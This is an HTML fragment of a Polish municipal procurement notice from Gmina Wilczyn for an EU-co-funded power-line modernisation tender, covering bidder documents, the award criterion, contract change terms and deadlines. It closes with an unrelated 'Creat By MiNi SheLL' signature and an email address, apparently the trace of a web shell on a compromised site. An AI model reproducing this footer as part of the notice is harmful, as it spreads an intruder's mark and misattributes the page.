<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Kosztorys ofertowy na modernizację linii energetycznej oraz kosztorys ofertowy na pozostałe roboty wykonany na podstawie dołączonych przedmiarów robót - podpisany przez wykonawcę.
2) Formularz ofertowy - podpisany przez wykonawcę - zał. nr 1. 
3) Formularz cenowy obejmujący modernizację linii energetycznej oraz pozostałe roboty - wypełniony i podpisany przez wykonawcę - zał. nr 2.
4) Wykaz osób do kontaktów z Zamawiającym - zał. nr 3.
5) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - zał. nr 4.
6) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych - zał. nr 5.
7) Zaparafowany Projekt umowy - zał. nr 8.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy - Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (w formie aneksu), w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
- Zmiany spowodowane warunkami atmosferycznymi w szczególności warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonanie przedmiotu zamówienia;
- Zmiany spowodowane siłą wyższą uniemożliwiającą wykonanie przedmiotu umowy;
- Zmiany obowiązującej stawki podatku od towarów i usług (VAT);
- Zmiana terminu realizacji zamówienia, w przypadku:
a)wystąpienia opóźnień w przekazaniu terenu budowy Wykonawcy z winy Zamawiającego,
b)przerw w realizacji robót powstałych z przyczyn nieleżących po stronie Wykonawcy,
c)wystąpienia robót dodatkowych nieprzewidzianych i nieobjętych zamówieniem podstawowym, których nie można było przewidzieć, a warunkujących wykonanie i dalszą realizację zamówienia podstawowego,
d)wystąpienia braków lub wad dokumentacji projektowej (lub w innych dokumentach dotyczących budowy) skutkujących dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót,
e)wystąpienia robót zamiennych w wyniku, których może zwiększyć się lub zmniejszyć ilość robót objętych kosztorysem ofertowym,
f)wystąpienia opóźnień w rozpoczęciu czynności odbiorowych oraz prób końcowych, 
g)wystąpienia zmian spowodowanych warunkami geologicznymi, archeologicznymi lub terenowymi w szczególności:
- odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntów itp.)
h)wystąpienia nieprzewidzianych przeszkód o charakterze formalno - prawnym lub faktycznym mającym bezpośredni wpływ na możliwość terminowego wykonania zamówienia, a niezależnych od żadnej ze stron umowy,
i)wystąpienia działania osób trzecich lub organów władzy publicznej, które spowodują przerwania lub czasowe zawieszenie realizacji zamówienia,
j)wystąpienia awarii nie zawinionej czynnościami lub nie wynikającej z zaniechania czynności, do których Wykonawca był zobowiązany. 

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wilczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wilczyn
ul. Strzelińska 12 D
62-550 Wilczyn
biuro nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 09:00, miejsce: Gmina Wilczyn
ul. Strzelińska 12 D
62-550 Wilczyn
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu Samorządu Województwa Wielkopolskiego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com